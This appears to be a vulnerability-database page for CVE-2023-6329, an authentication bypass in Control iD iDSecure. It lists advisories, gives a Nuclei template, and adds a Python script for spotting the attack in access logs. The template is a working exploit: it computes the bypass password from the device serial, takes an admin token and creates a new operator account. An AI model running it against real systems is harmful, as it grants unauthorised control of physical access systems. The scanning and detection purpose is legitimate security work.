| Title | Published | Views | Reporter |
|---|---|---|---|
| The vulnerability of the iDSecure access control system stems from deficiencies in the authentication process. This allows attackers to bypass the authentication procedures, gain unauthorized access to protected information, and increase their privileges. | 6 Dec 2023 00:00 | – | bdu_fstec |
| CVE-2023-6329 | 17 Dec 2023 09:37 | – | circl |
| Control iD iDSecure Security Breach | 27 Nov 2023 00:00 | – | cnnvd |
| CVE-2023-6329 | 27 Nov 2023 16:34 | – | cve |
| CVE-2023-6329 Control iD iDSecure passwordCustom Authentication Bypass | 27 Nov 2023 16:34 | – | cvelist |
| Exploit for Improper Authentication in Controlid Idsecure | 11 Mar 2026 15:04 | – | githubexploit |
| Control iD iDSecure Authentication Bypass (CVE-2023-6329) | 27 Aug 2024 18:53 | – | metasploit |
| CVE-2023-6329 | 27 Nov 2023 17:15 | – | nvd |
| CVE-2023-6329 | 27 Nov 2023 17:15 | – | osv |
| Control ID IDSecure Authentication Bypass | 31 Aug 2024 00:00 | – | packetstorm |
```yaml
id: CVE-2023-6329

info:
  name: Control iD iDSecure - Authentication Bypass
  author: DhiyaneshDK,princechaddha
  severity: critical
  description: |
    An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user.
  impact: |
    Successful exploitation could allow an attacker to bypass authentication controls.
  remediation: |
    Apply the vendor-supplied patch or update to the latest firmware version to mitigate the vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6329
    cwe-id: CWE-287
    epss-score: 0.65237
    epss-percentile: 0.99156
    cpe: cpe:2.3:a:controlid:idsecure:4.7.32.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: controlid
    product: idsecure
    fofa-query: body="iDSecure"
  tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive,vuln,vkev

variables:
  username: "{{rand_base(8)}}"
  password: "{{randstr}}"
  sha1Hash: "{{sha1(serial)}}"
  passwordRandom: "{{rand_text_numeric(10)}}"

flow: |
  http(1);
  javascript();
  http(2);
  http(3);

javascript:
  - code: |
      var passwordRandom = passwordRandom;
      var sha1Hash = template.sha1Hash;
      var sha256Hash=(sha256combined.substring(0,6))
      var passwordCustom = parseInt(sha256Hash, 16).toString();
      passwordCustom

    args:
      sha1Hash: "{{sha1Hash}}"
      sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}"
      passwordRandom: "{{passwordRandom}}"

http:
  - raw:
      - |
        GET /api/login/unlockGetData HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'serial'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: serial
        internal: true
        json:
          - '.serial'

  - raw:
      - |
        POST /api/login/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"passwordCustom": "{{javascript_response}}", "passwordRandom": "{{passwordRandom}}"}

    matchers:
      - type: word
        part: body
        words:
          - 'accessToken'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: access-token
        internal: true
        json:
          - '.accessToken'

  - raw:
      - |
        POST /api/operator/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer {{access-token}}
        Content-Type: application/json

        {"idType": "1", "name": "{{username}}", "user": "{{username}}", "newPassword": "{{password}}", "password_confirmation": "{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "code", "newID")'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 490a00463044022062313c3cecc1508b4baf5d390c82cc3fca84d8a2a153e754b4fd2f2cfdff12490220117836c86098ecbf967ffcc22280be4bb89ff42be32b00b75c07c14e0f117814:922c64590222798bb761d5b6d8e72950
```
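For defenders, the request order in the template above (serial fetch, login, operator creation) can be hunted for in web access logs. The following is an added example, not part of the original template or the vendor's code; the combined-log line format, the 60-second window, the function name `find_bypass_sequences` and the sample lines are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in combined-log style (assumed format; adapt the regex to your proxy).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Sep/2024:10:15:01 +0000] "GET /api/login/unlockGetData HTTP/1.1" 200 88
203.0.113.7 - - [02/Sep/2024:10:15:02 +0000] "POST /api/login/ HTTP/1.1" 200 412
198.51.100.20 - - [02/Sep/2024:10:15:02 +0000] "POST /api/login/ HTTP/1.1" 200 409
203.0.113.7 - - [02/Sep/2024:10:15:03 +0000] "POST /api/operator/ HTTP/1.1" 200 35
198.51.100.20 - - [02/Sep/2024:10:40:00 +0000] "POST /api/operator/ HTTP/1.1" 200 35
192.0.2.9 - - [02/Sep/2024:11:00:00 +0000] "GET /api/login/unlockGetData HTTP/1.1" 200 88
192.0.2.9 - - [02/Sep/2024:11:00:01 +0000] "POST /api/login/ HTTP/1.1" 401 20
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Request order taken from the template: serial fetch, login, operator creation.
STEPS = [("GET", "/api/login/unlockgetdata"), ("POST", "/api/login"), ("POST", "/api/operator")]


def find_bypass_sequences(log_text, window=timedelta(seconds=60)):
    """Return (ip, first_ts, last_ts) for clients completing all three steps in order within `window`."""
    progress = {}  # ip -> (index of next expected step, timestamp of step 1)
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["status"].startswith("2"):
            continue  # unparsable line or failed request: cannot advance the chain
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        req = (m["method"], m["path"].split("?")[0].rstrip("/").lower())
        step, start = progress.get(m["ip"], (0, ts))
        if step and ts - start > window:
            step, start = 0, ts  # stale chain, start over
        if req == STEPS[0]:
            progress[m["ip"]] = (1, ts)  # (re)start the chain on every serial fetch
        elif step and req == STEPS[step]:
            if step == len(STEPS) - 1:
                alerts.append((m["ip"], start, ts))
                progress.pop(m["ip"], None)
            else:
                progress[m["ip"]] = (step + 1, start)
    return alerts


if __name__ == "__main__":
    for ip, first, last in find_bypass_sequences(SAMPLE_LOG):
        print(f"ALERT {ip}: unlockGetData -> login -> operator creation between {first} and {last}")
```

A hit is a lead rather than proof of compromise: confirm it by reviewing the operator accounts created at the reported time.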